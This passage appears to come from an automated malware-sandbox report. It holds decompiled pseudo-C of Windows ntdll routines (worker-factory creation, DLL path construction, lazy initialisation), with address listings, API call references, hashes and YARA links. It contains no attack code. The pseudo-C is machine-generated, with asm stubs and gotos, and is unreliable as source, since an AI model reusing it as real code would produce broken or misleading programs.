							 *0x6b2c53dc = _t139;
							 *((intOrPtr*)(_t183 - 4)) = 1;
							_t130 = E6B203B3D();
							goto L23;
						}
					}
				}
			}





























                                                                                                                            0x6b2037eb
                                                                                                                            0x6b2037ed
                                                                                                                            0x6b2037f2
                                                                                                                            0x6b2037f7
                                                                                                                            0x6b2037fa
                                                                                                                            0x6b203803
                                                                                                                            0x6b203806
                                                                                                                            0x6b20380b
                                                                                                                            0x6b20380e
                                                                                                                            0x6b203817
                                                                                                                            0x6b20381e
                                                                                                                            0x6b24615c
                                                                                                                            0x6b203b0c
                                                                                                                            0x6b203b13
                                                                                                                            0x6b203b13
                                                                                                                            0x6b203827
                                                                                                                            0x6b20382a
                                                                                                                            0x6b20382d
                                                                                                                            0x6b203836
                                                                                                                            0x6b20383e
                                                                                                                            0x6b246168
                                                                                                                            0x6b24616e
                                                                                                                            0x6b24616e
                                                                                                                            0x6b246168
                                                                                                                            0x6b203865
                                                                                                                            0x6b203867
                                                                                                                            0x6b20386a
                                                                                                                            0x6b20386d
                                                                                                                            0x6b203876
                                                                                                                            0x6b246176
                                                                                                                            0x6b246176
                                                                                                                            0x6b24617b
                                                                                                                            0x00000000
                                                                                                                            0x6b20387c
                                                                                                                            0x6b203882
                                                                                                                            0x6b203888
                                                                                                                            0x6b2038a2
                                                                                                                            0x6b2038a4
                                                                                                                            0x6b2038a9
                                                                                                                            0x6b246183
                                                                                                                            0x6b246188
                                                                                                                            0x6b24618b
                                                                                                                            0x6b203ad9
                                                                                                                            0x6b203ad9
                                                                                                                            0x6b203ae0
                                                                                                                            0x6b203ae7
                                                                                                                            0x6b203aee
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b203af3
                                                                                                                            0x6b203afc
                                                                                                                            0x6b246288
                                                                                                                            0x6b24628d
                                                                                                                            0x6b246290
                                                                                                                            0x6b203b02
                                                                                                                            0x6b203b02
                                                                                                                            0x6b203b02
                                                                                                                            0x6b203b0a
                                                                                                                            0x6b203b71
                                                                                                                            0x6b203b73
                                                                                                                            0x6b203b73
                                                                                                                            0x00000000
                                                                                                                            0x6b203b0a
                                                                                                                            0x6b2038af
                                                                                                                            0x6b2038b1
                                                                                                                            0x6b2038b4
                                                                                                                            0x6b2038b7
                                                                                                                            0x6b2038bd
                                                                                                                            0x6b2038cd
                                                                                                                            0x6b2038d1
                                                                                                                            0x6b2038d2
                                                                                                                            0x6b2038d2
                                                                                                                            0x6b2038d7
                                                                                                                            0x6b2038d9
                                                                                                                            0x6b2038d9
                                                                                                                            0x6b2038e1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2038e6
                                                                                                                            0x6b2038e9
                                                                                                                            0x6b2038ec
                                                                                                                            0x6b2038ef
                                                                                                                            0x6b2038f1
                                                                                                                            0x6b2038f1
                                                                                                                            0x6b2038fa
                                                                                                                            0x6b203900
                                                                                                                            0x6b203916
                                                                                                                            0x6b20391b
                                                                                                                            0x6b20391e
                                                                                                                            0x6b203923
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20392f
                                                                                                                            0x6b203935
                                                                                                                            0x6b20394d
                                                                                                                            0x6b203952
                                                                                                                            0x6b203955
                                                                                                                            0x6b20395a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b203960
                                                                                                                            0x6b203965
                                                                                                                            0x6b203968
                                                                                                                            0x6b20396b
                                                                                                                            0x6b203978
                                                                                                                            0x6b20397a
                                                                                                                            0x6b20397f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b203985
                                                                                                                            0x6b20398f
                                                                                                                            0x6b203992
                                                                                                                            0x6b203995
                                                                                                                            0x6b203998
                                                                                                                            0x6b20399b
                                                                                                                            0x6b20399e
                                                                                                                            0x6b2039a1
                                                                                                                            0x6b2039a4
                                                                                                                            0x6b2039ad
                                                                                                                            0x6b246195
                                                                                                                            0x6b2039b3
                                                                                                                            0x6b2039b3
                                                                                                                            0x6b2039b3
                                                                                                                            0x6b2039b4
                                                                                                                            0x6b2039b7
                                                                                                                            0x6b2039ba
                                                                                                                            0x6b2039bb
                                                                                                                            0x6b2039bc
                                                                                                                            0x6b2039c7
                                                                                                                            0x6b2039c9
                                                                                                                            0x6b2039ce
                                                                                                                            0x00000000
                                                                                                                            0x6b2039d4
                                                                                                                            0x6b2039d7
                                                                                                                            0x6b2039da
                                                                                                                            0x6b2039e2
                                                                                                                            0x6b2039ec
                                                                                                                            0x6b2039ee
                                                                                                                            0x6b2039ee
                                                                                                                            0x6b2039f0
                                                                                                                            0x6b2039f3
                                                                                                                            0x6b2039f6
                                                                                                                            0x6b2039f9
                                                                                                                            0x6b2039fa
                                                                                                                            0x6b2039fb
                                                                                                                            0x6b203a00
                                                                                                                            0x6b203a02
                                                                                                                            0x6b203a05
                                                                                                                            0x6b203a06
                                                                                                                            0x6b203a11
                                                                                                                            0x6b203a13
                                                                                                                            0x6b203a18
                                                                                                                            0x6b203aca
                                                                                                                            0x6b203aca
                                                                                                                            0x6b203acd
                                                                                                                            0x6b203ad4
                                                                                                                            0x00000000
                                                                                                                            0x6b203a1e
                                                                                                                            0x6b203a22
                                                                                                                            0x6b203b14
                                                                                                                            0x6b203b19
                                                                                                                            0x6b203b1a
                                                                                                                            0x6b203b1c
                                                                                                                            0x6b203b24
                                                                                                                            0x6b203b26
                                                                                                                            0x6b203b2b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b203b31
                                                                                                                            0x6b203b31
                                                                                                                            0x6b203a28
                                                                                                                            0x6b203a2b
                                                                                                                            0x6b203a31
                                                                                                                            0x6b203a37
                                                                                                                            0x6b203a3e
                                                                                                                            0x6b203a3e
                                                                                                                            0x6b203a41
                                                                                                                            0x6b203a44
                                                                                                                            0x6b203a46
                                                                                                                            0x6b203a46
                                                                                                                            0x6b203a49
                                                                                                                            0x6b203a4c
                                                                                                                            0x6b203a4e
                                                                                                                            0x6b203a4e
                                                                                                                            0x6b203a54
                                                                                                                            0x6b203a57
                                                                                                                            0x6b203a5f
                                                                                                                            0x6b203a67
                                                                                                                            0x6b203a6a
                                                                                                                            0x6b203a70
                                                                                                                            0x6b203a7a
                                                                                                                            0x6b203a7c
                                                                                                                            0x6b203a81
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b203a83
                                                                                                                            0x6b203a85
                                                                                                                            0x6b203a8d
                                                                                                                            0x6b203a92
                                                                                                                            0x6b203a99
                                                                                                                            0x6b203a99
                                                                                                                            0x6b203a9f
                                                                                                                            0x6b203aac
                                                                                                                            0x6b203b6c
                                                                                                                            0x6b203b6f
                                                                                                                            0x00000000
                                                                                                                            0x6b203b6f
                                                                                                                            0x6b203ab2
                                                                                                                            0x6b203ab4
                                                                                                                            0x6b203ab7
                                                                                                                            0x6b203ab9
                                                                                                                            0x6b203abe
                                                                                                                            0x6b203ac5
                                                                                                                            0x00000000
                                                                                                                            0x6b203ac5
                                                                                                                            0x6b203a18
                                                                                                                            0x6b2039ce

                                                                                                                            APIs
                                                                                                                            • RtlImageNtHeader.1105(?,6B2AFF48,00000050,6B203E98,?,6B1FF900,00000000,00000000,?,?,?,6B2AFEB8,0000001C,6B1D2C4C,?), ref: 6B203817
                                                                                                                              • Part of subcall function 6B1EB060: RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,?,?,?,6B20381C,?,6B2AFF48,00000050,6B203E98,?,6B1FF900,00000000,00000000), ref: 6B1EB076
                                                                                                                            • RtlAllocateHeap.1105(?,?,00000120,?,6B2AFF48,00000050,6B203E98,?,6B1FF900,00000000,00000000,?,?,?,6B2AFEB8,0000001C), ref: 6B203860
                                                                                                                            • RtlAllocateHeap.1105(?,?,00000000,?,?,00000120,?,6B2AFF48,00000050,6B203E98,?,6B1FF900,00000000,00000000), ref: 6B20389D
                                                                                                                            • RtlAllocateHeap.1105(?,?,?,?,?,00000000,?,?,00000120,?,6B2AFF48,00000050,6B203E98,?,6B1FF900,00000000), ref: 6B203916
                                                                                                                            • RtlAllocateHeap.1105(?,?,00000000,?,?,?,?,?,00000000,?,?,00000120,?,6B2AFF48,00000050,6B203E98), ref: 6B20394D
                                                                                                                            • ZwCreateIoCompletion.1105(00000028,001F0003,00000000,?), ref: 6B2039C2
                                                                                                                            • ZwCreateWorkerFactory.1105(00000024,000F00FF,00000000,?,000000FF,6B1FC740,00000000,7FFE03C0,?,?,00000028,001F0003,00000000,?), ref: 6B203A0C
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C86B4,00000000,00000024,000F00FF,00000000,?,000000FF,6B1FC740,00000000,7FFE03C0,?,?,00000028,001F0003,00000000,?), ref: 6B203A8D
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,00000000,?,?,?,?,?,00000000,?,?,00000120,?,6B2AFF48,00000050,6B203E98), ref: 6B203AF5
                                                                                                                            • ZwSetInformationWorkerFactory.1105(?,0000000D,00000000,00000004,00000024,000F00FF,00000000,?,000000FF,6B1FC740,00000000,7FFE03C0,?,?,00000028,001F0003), ref: 6B203B1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap$CreateFactoryHeaderImageWorker$AcquireCompletionCurrentExclusiveInformationLockServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 358453882-0
                                                                                                                            • Opcode ID: edcce5d1ffaa23296c9141a0ca46d576d4bfa3f747ba05ab1b5c2d3bf8e4a2b2
                                                                                                                            • Instruction ID: 679f050853f18882f16e21764bc415dba70420b47f141ee2544f2dfc0f4bbfe4
                                                                                                                            • Opcode Fuzzy Hash: edcce5d1ffaa23296c9141a0ca46d576d4bfa3f747ba05ab1b5c2d3bf8e4a2b2
                                                                                                                            • Instruction Fuzzy Hash: 38B137B1900609DFCB25CFA9C980B9EBBF5FB49714F10856EE51AAB390DB389901CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B25AE60, Relevance: 15.2, APIs: 5, Strings: 5, Instructions: 247COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E6B25AE60(signed short* _a4, short* _a8, short* _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				signed int _v24;
				unsigned int _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				signed short* _t85;
				unsigned int _t86;
				signed short _t100;
				short* _t109;
				short _t111;
				signed int _t113;
				void* _t130;
				signed short _t132;
				signed int _t133;
				signed short _t135;
				short* _t144;
				signed int _t148;
				signed int _t150;
				int _t151;
				void* _t153;
				void* _t154;
				signed short _t155;
				signed int _t156;
				short* _t159;
				short* _t160;
				signed short* _t161;
				unsigned int _t167;
				signed int _t169;
				unsigned int _t170;
				void* _t172;
				signed short _t176;
				void* _t177;
				int _t178;
				int _t180;
				void* _t183;
				void* _t184;
				signed int _t186;
				void* _t187;
				void* _t188;

				_t85 = _a4;
				_t150 = 0;
				_v40 = 0;
				_t176 =  *_t85 & 0x0000ffff;
				_t155 = _t85[2];
				_t86 = _t176 & 0x0000ffff;
				_v16 = _t155;
				_v24 = 0;
				_v20 = _t176;
				_v12 = 0x5c;
				_v28 = 0x2f;
				_t170 = _t86;
				if(_t86 == 0) {
					L11:
					_v20 = 0;
					asm("sbb eax, eax");
					_v36 = ( ~_t150 & 0xfffffff8) + 8;
					_v8 = _t170 - (_v16 - _t155 & 0xfffffffe);
					_t172 =  *0x6b2c6e54;
					_v44 = 0;
					if(_t172 != 0) {
						_t156 =  *0x6b2c6e50 & 0x0000ffff;
						_t151 = 0;
						_v20 = _v12;
						if(_t156 == 0) {
							L32:
							_t167 = _v8;
							L33:
							_t100 = _v36 + 0xe + _t151 + _v20 + _t167 + 2;
							_v32 = _t100;
							if(_t100 > 0xfffe) {
								L22:
								return 0xc0000106;
							}
							_t177 = E6B1F3A1C(_t100 & 0x0000ffff);
							_v36 = _t177;
							if(_t177 != 0) {
								memcpy(_t177, _t172, _t151);
								_t188 = _t187 + 0xc;
								_t153 = _t177 + (_t151 >> 1) * 2;
								_t178 = _v20;
								if(_t178 != 0) {
									memcpy(_t153, L"\\microsoft.system.package.metadata\\Application", _t178);
									_t188 = _t188 + 0xc;
									_t153 = _t153 + (_t178 >> 1) * 2;
								}
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t180 = _v8;
								 *((short*)(_t153 + 0xc)) = _v12;
								_t154 = _t153 + 0xe;
								memcpy(_t154, _v16, _t180);
								_t109 = _t154 + (_t180 >> 1) * 2;
								if(_v24 != 0) {
									 *_t109 = 0;
								} else {
									asm("movsd");
									asm("movsd");
									asm("movsw");
								}
								_t159 = _a8;
								 *((intOrPtr*)(_t159 + 4)) = _v40;
								_t111 = _v44;
								 *((short*)(_t159 + 2)) = _t111;
								 *_t159 = _t111;
								if(_t111 != 0) {
									 *_t159 = _t111 + 0xfffffffe;
								}
								_t160 = _a12;
								_t82 =  &_v32; // 0x6b264109
								 *((intOrPtr*)(_t160 + 4)) = _v36;
								_t113 =  *_t82 & 0x0000ffff;
								 *(_t160 + 2) = _t113;
								 *_t160 = _t113 + 0xfffffffe;
								return 0;
							}
							L35:
							return 0xc0000017;
						}
						while( *((short*)(_t172 + (_t151 >> 1) * 2)) != 0x3b) {
							_t151 = _t151 + 2;
							if(_t151 < _t156) {
								continue;
							}
							goto L32;
						}
						goto L32;
					}
					_t151 =  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff;
					_t172 =  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c);
					_v32 = _t172;
					if(( *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 8) & 0x00000001) == 0) {
						_t172 = _t172 +  *((intOrPtr*)( *[fs:0x30] + 0x10));
						_v32 = _t172;
					}
					_t161 = _t172 + ((_t151 >> 1) - 1) * 2;
					_t130 = _t172;
					while(_t161 > _t172) {
						_t169 =  *_t161 & 0x0000ffff;
						if(_t169 == _v12 || _t169 == _v28) {
							_t130 =  &(_t161[1]);
							L21:
							_t132 = _t130 - _t172 & 0xfffffffe;
							if(_t132 <= 0xfffe) {
								_t133 = _t132 & 0x0000ffff;
								_v28 = _t133;
								if(_t176 > 0xfffc) {
									goto L22;
								}
								_t135 = _v36 + _t133 + _v8 + 2;
								if(_t135 > 0xfffe) {
									goto L22;
								}
								_v44 = _t135 & 0x0000ffff;
								_t183 = E6B1F3A1C(_t135 & 0x0000ffff);
								_v40 = _t183;
								if(_t183 == 0) {
									goto L35;
								}
								memcpy(_t183, _t172, _v28);
								_t184 = _t183 + (_v28 >> 1) * 2;
								memcpy(_t184, _v16, _v8);
								_t167 = _v8;
								_t187 = _t187 + 0x18;
								_t144 = _t184 + (_t167 >> 1) * 2;
								if(_v24 != 0) {
									 *_t144 = 0;
								} else {
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t52 =  &_v32; // 0x6b264109
									_t172 =  *_t52;
								}
								goto L33;
							}
							goto L22;
						} else {
							_t161 = _t161 - 2;
							continue;
						}
					}
					goto L21;
				}
				_t148 = _t155 + ((_t86 >> 1) - 1) * 2;
				if(_t148 <= _t155) {
					goto L11;
				} else {
					goto L2;
				}
				do {
					L2:
					_t186 =  *_t148 & 0x0000ffff;
					if(_t186 != 0x2e) {
						if(_t186 == _v12 || _t186 == _v28) {
							_v16 = _t148 + 2;
							L10:
							_t176 = _v20;
							goto L11;
						} else {
							goto L7;
						}
					} else {
						if(_t150 == 0) {
							_t150 = _t148;
							_v24 = _t150;
						}
					}
					L7:
					_t148 = _t148 - 2;
				} while (_t148 > _t155);
				goto L10;
			}















































                                                                                                                            0x6b25ae68
                                                                                                                            0x6b25ae6f
                                                                                                                            0x6b25ae71
                                                                                                                            0x6b25ae74
                                                                                                                            0x6b25ae77
                                                                                                                            0x6b25ae7a
                                                                                                                            0x6b25ae7d
                                                                                                                            0x6b25ae80
                                                                                                                            0x6b25ae83
                                                                                                                            0x6b25ae86
                                                                                                                            0x6b25ae8d
                                                                                                                            0x6b25ae95
                                                                                                                            0x6b25ae9a
                                                                                                                            0x6b25aed7
                                                                                                                            0x6b25aed9
                                                                                                                            0x6b25aede
                                                                                                                            0x6b25aee6
                                                                                                                            0x6b25aef5
                                                                                                                            0x6b25aef8
                                                                                                                            0x6b25aefe
                                                                                                                            0x6b25af03
                                                                                                                            0x6b25b000
                                                                                                                            0x6b25b007
                                                                                                                            0x6b25b00c
                                                                                                                            0x6b25b011
                                                                                                                            0x6b25b025
                                                                                                                            0x6b25b025
                                                                                                                            0x6b25b028
                                                                                                                            0x6b25b036
                                                                                                                            0x6b25b038
                                                                                                                            0x6b25b040
                                                                                                                            0x6b25af73
                                                                                                                            0x00000000
                                                                                                                            0x6b25af73
                                                                                                                            0x6b25b04f
                                                                                                                            0x6b25b051
                                                                                                                            0x6b25b056
                                                                                                                            0x6b25b065
                                                                                                                            0x6b25b06c
                                                                                                                            0x6b25b06f
                                                                                                                            0x6b25b072
                                                                                                                            0x6b25b077
                                                                                                                            0x6b25b080
                                                                                                                            0x6b25b085
                                                                                                                            0x6b25b08a
                                                                                                                            0x6b25b08a
                                                                                                                            0x6b25b097
                                                                                                                            0x6b25b098
                                                                                                                            0x6b25b099
                                                                                                                            0x6b25b09a
                                                                                                                            0x6b25b0a1
                                                                                                                            0x6b25b0a5
                                                                                                                            0x6b25b0a9
                                                                                                                            0x6b25b0b9
                                                                                                                            0x6b25b0bc
                                                                                                                            0x6b25b0cd
                                                                                                                            0x6b25b0be
                                                                                                                            0x6b25b0c5
                                                                                                                            0x6b25b0c6
                                                                                                                            0x6b25b0c7
                                                                                                                            0x6b25b0c7
                                                                                                                            0x6b25b0d0
                                                                                                                            0x6b25b0d6
                                                                                                                            0x6b25b0d9
                                                                                                                            0x6b25b0dc
                                                                                                                            0x6b25b0e0
                                                                                                                            0x6b25b0e5
                                                                                                                            0x6b25b0ea
                                                                                                                            0x6b25b0ea
                                                                                                                            0x6b25b0ed
                                                                                                                            0x6b25b0f3
                                                                                                                            0x6b25b0f6
                                                                                                                            0x6b25b0f9
                                                                                                                            0x6b25b0fc
                                                                                                                            0x6b25b103
                                                                                                                            0x00000000
                                                                                                                            0x6b25b106
                                                                                                                            0x6b25b058
                                                                                                                            0x00000000
                                                                                                                            0x6b25b058
                                                                                                                            0x6b25b013
                                                                                                                            0x6b25b01e
                                                                                                                            0x6b25b023
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b25b023
                                                                                                                            0x00000000
                                                                                                                            0x6b25b013
                                                                                                                            0x6b25af12
                                                                                                                            0x6b25af1f
                                                                                                                            0x6b25af28
                                                                                                                            0x6b25af32
                                                                                                                            0x6b25af3a
                                                                                                                            0x6b25af3d
                                                                                                                            0x6b25af3d
                                                                                                                            0x6b25af45
                                                                                                                            0x6b25af48
                                                                                                                            0x6b25af5e
                                                                                                                            0x6b25af4c
                                                                                                                            0x6b25af53
                                                                                                                            0x6b25af64
                                                                                                                            0x6b25af67
                                                                                                                            0x6b25af69
                                                                                                                            0x6b25af71
                                                                                                                            0x6b25af82
                                                                                                                            0x6b25af85
                                                                                                                            0x6b25af8b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b25af96
                                                                                                                            0x6b25af9d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b25afa3
                                                                                                                            0x6b25afab
                                                                                                                            0x6b25afad
                                                                                                                            0x6b25afb2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b25afbd
                                                                                                                            0x6b25afcd
                                                                                                                            0x6b25afd1
                                                                                                                            0x6b25afd6
                                                                                                                            0x6b25afd9
                                                                                                                            0x6b25afe4
                                                                                                                            0x6b25afe7
                                                                                                                            0x6b25affb
                                                                                                                            0x6b25afe9
                                                                                                                            0x6b25aff0
                                                                                                                            0x6b25aff1
                                                                                                                            0x6b25aff2
                                                                                                                            0x6b25aff4
                                                                                                                            0x6b25aff4
                                                                                                                            0x6b25aff4
                                                                                                                            0x00000000
                                                                                                                            0x6b25afe7
                                                                                                                            0x00000000
                                                                                                                            0x6b25af5b
                                                                                                                            0x6b25af5b
                                                                                                                            0x00000000
                                                                                                                            0x6b25af5b
                                                                                                                            0x6b25af53
                                                                                                                            0x00000000
                                                                                                                            0x6b25af62
                                                                                                                            0x6b25ae9f
                                                                                                                            0x6b25aea4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b25aea6
                                                                                                                            0x6b25aea6
                                                                                                                            0x6b25aea6
                                                                                                                            0x6b25aeac
                                                                                                                            0x6b25aebd
                                                                                                                            0x6b25aed1
                                                                                                                            0x6b25aed4
                                                                                                                            0x6b25aed4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b25aeae
                                                                                                                            0x6b25aeb0
                                                                                                                            0x6b25aeb2
                                                                                                                            0x6b25aeb4
                                                                                                                            0x6b25aeb4
                                                                                                                            0x6b25aeb0
                                                                                                                            0x6b25aec5
                                                                                                                            0x6b25aec5
                                                                                                                            0x6b25aec8
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • memcpy.1105(00000000,?,0000002F,?,?,00000000,?,?,?,?,6B264109), ref: 6B25AFBD
                                                                                                                            • memcpy.1105(00000000,00000000,?,00000000,?,0000002F,?,?,00000000,?,?,?,?,6B264109), ref: 6B25AFD1
                                                                                                                            • memcpy.1105(00000000,?,00000000,?,?,00000000,?,?,?,?,6B264109), ref: 6B25B065
                                                                                                                            • memcpy.1105(00000000,\microsoft.system.package.metadata\Application,?,?,00000000,?,?,?,?,6B264109), ref: 6B25B080
                                                                                                                            • memcpy.1105(-0000000E,00000000,?,?,00000000,?,?,?,?,6B264109), ref: 6B25B0A9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID: A&k/$.DLL$.Local$\$\microsoft.system.package.metadata\Application
                                                                                                                            • API String ID: 3510742995-3058288426
                                                                                                                            • Opcode ID: 3b1ed23ee375ed2d601886c8f8c630f4c883ff6c09301c25a181503ca7719c9d
                                                                                                                            • Instruction ID: 357f4a4883e7b8417d9fa27729773ed688a5a6c9080fc8d3b05127215277eff3
                                                                                                                            • Opcode Fuzzy Hash: 3b1ed23ee375ed2d601886c8f8c630f4c883ff6c09301c25a181503ca7719c9d
                                                                                                                            • Instruction Fuzzy Hash: 68918F72D0061E9BCB11CFA8C8C1AAEB7F1EF49711F5541A9E814E7390E739D951CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FF86D, Relevance: 15.1, APIs: 10, Instructions: 124threadmemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E6B1FF86D(void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t31;
				signed int _t40;
				signed int _t45;
				signed int _t46;
				signed int _t48;
				signed int _t50;
				signed int _t53;
				intOrPtr _t60;
				signed int* _t66;
				signed int _t67;
				signed int* _t70;
				void* _t71;

				_t64 = __edx;
				_t61 = __ecx;
				_push(0x1c);
				_push(0x6b2afeb8);
				E6B22D08C(__ebx, __edi, __esi);
				_t60 = __edx;
				 *((intOrPtr*)(_t71 - 0x28)) = __edx;
				_t70 = __ecx;
				 *((intOrPtr*)(_t71 - 0x2c)) = __ecx;
				_t66 =  *(_t71 + 8);
				if(_t66 == 0 || __ecx == 0 || __edx == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E6B2A88F5(_t60, _t61, _t64, _t66, _t70, __eflags);
					_t31 = 0xc000000d;
					goto L9;
				} else {
					if( *__ecx == 0) {
						L10:
						 *(_t71 - 0x20) =  *(_t71 - 0x20) & 0x00000000;
						_t67 = E6B203E70(_t71 - 0x20, 0);
						 *(_t71 - 0x24) = _t67;
						__eflags = _t67;
						if(_t67 < 0) {
							L24:
							_t31 = _t67;
							L9:
							return E6B22D0D1(_t31);
						}
						E6B1F2280(_t36, _t60);
						 *(_t71 - 4) = 1;
						__eflags =  *_t70;
						if( *_t70 != 0) {
							asm("lock inc dword [eax]");
							L21:
							 *(_t71 - 4) = 0xfffffffe;
							E6B1FF9DD(_t60);
							_t40 =  *(_t71 - 0x20);
							__eflags = _t40;
							if(__eflags != 0) {
								_push(_t40);
								E6B1D9100(_t60, _t61, _t67, _t70, __eflags);
							}
							__eflags = _t67;
							if(_t67 >= 0) {
								 *( *(_t71 + 8)) =  *_t70;
							}
							goto L24;
						}
						__eflags = _t70 - 0x6b2c86c0;
						if(_t70 != 0x6b2c86c0) {
							__eflags = _t70 - 0x6b2c86b8;
							if(_t70 != 0x6b2c86b8) {
								L20:
								 *_t70 =  *(_t71 - 0x20);
								_t20 = _t71 - 0x20;
								 *_t20 =  *(_t71 - 0x20) & 0x00000000;
								__eflags =  *_t20;
								goto L21;
							}
							E6B205AA0(_t61,  *(_t71 - 0x20), 1);
							_t45 = E6B1D95F0( *(_t71 - 0x20), 1);
							L27:
							_t67 = _t45;
							__eflags = _t67;
							 *(_t71 - 0x24) = _t67;
							if(_t67 >= 0) {
								goto L20;
							}
							goto L21;
						}
						_t46 =  *0x6b2c8754;
						__eflags = _t46;
						if(_t46 != 0) {
							E6B205AA0(_t61,  *(_t71 - 0x20), _t46);
						} else {
							_t50 =  *0x7ffe03c0 << 3;
							__eflags = _t50 - 0x300;
							if(_t50 < 0x300) {
								_t50 = 0x300;
							}
							E6B205AA0(0x300,  *(_t71 - 0x20), _t50);
							_t53 =  *0x7ffe03c0 << 2;
							_t61 = 0x180;
							__eflags = _t53 - 0x180;
							if(_t53 < 0x180) {
								_t53 = 0x180;
							}
							E6B215C70( *(_t71 - 0x20), _t53);
						}
						_t48 =  *0x6b2c8750;
						__eflags = _t48;
						if(_t48 != 0) {
							_t45 = E6B1DB8F0( *(_t71 - 0x20), _t48);
							goto L27;
						} else {
							goto L20;
						}
					}
					 *((char*)(_t71 - 0x19)) = 0;
					E6B1FFAD0(__edx);
					 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
					if( *_t70 != 0) {
						asm("lock inc dword [eax]");
						 *_t66 =  *_t70;
						 *((char*)(_t71 - 0x19)) = 1;
					}
					 *(_t71 - 4) = 0xfffffffe;
					E6B1FF9D6(_t60);
					if( *((char*)(_t71 - 0x19)) == 0) {
						goto L10;
					} else {
						_t31 = 0;
						goto L9;
					}
				}
			}















                                                                                                                            0x6b1ff86d
                                                                                                                            0x6b1ff86d
                                                                                                                            0x6b1ff86d
                                                                                                                            0x6b1ff86f
                                                                                                                            0x6b1ff874
                                                                                                                            0x6b1ff879
                                                                                                                            0x6b1ff87b
                                                                                                                            0x6b1ff87e
                                                                                                                            0x6b1ff880
                                                                                                                            0x6b1ff883
                                                                                                                            0x6b1ff888
                                                                                                                            0x6b2447c9
                                                                                                                            0x6b2447ce
                                                                                                                            0x00000000
                                                                                                                            0x6b1ff8b1
                                                                                                                            0x6b1ff8b4
                                                                                                                            0x6b1ff8f1
                                                                                                                            0x6b1ff8f1
                                                                                                                            0x6b1ff900
                                                                                                                            0x6b1ff902
                                                                                                                            0x6b1ff905
                                                                                                                            0x6b1ff907
                                                                                                                            0x6b1ff9a9
                                                                                                                            0x6b1ff9a9
                                                                                                                            0x6b1ff8e9
                                                                                                                            0x6b1ff8ee
                                                                                                                            0x6b1ff8ee
                                                                                                                            0x6b1ff90e
                                                                                                                            0x6b1ff913
                                                                                                                            0x6b1ff91c
                                                                                                                            0x6b1ff91e
                                                                                                                            0x6b1ff9e4
                                                                                                                            0x6b1ff98b
                                                                                                                            0x6b1ff98b
                                                                                                                            0x6b1ff992
                                                                                                                            0x6b1ff997
                                                                                                                            0x6b1ff99a
                                                                                                                            0x6b1ff99c
                                                                                                                            0x6b1ff9e9
                                                                                                                            0x6b1ff9ea
                                                                                                                            0x6b1ff9ea
                                                                                                                            0x6b1ff99e
                                                                                                                            0x6b1ff9a0
                                                                                                                            0x6b1ff9a7
                                                                                                                            0x6b1ff9a7
                                                                                                                            0x00000000
                                                                                                                            0x6b1ff9a0
                                                                                                                            0x6b1ff924
                                                                                                                            0x6b1ff92a
                                                                                                                            0x6b1ff9b0
                                                                                                                            0x6b1ff9b6
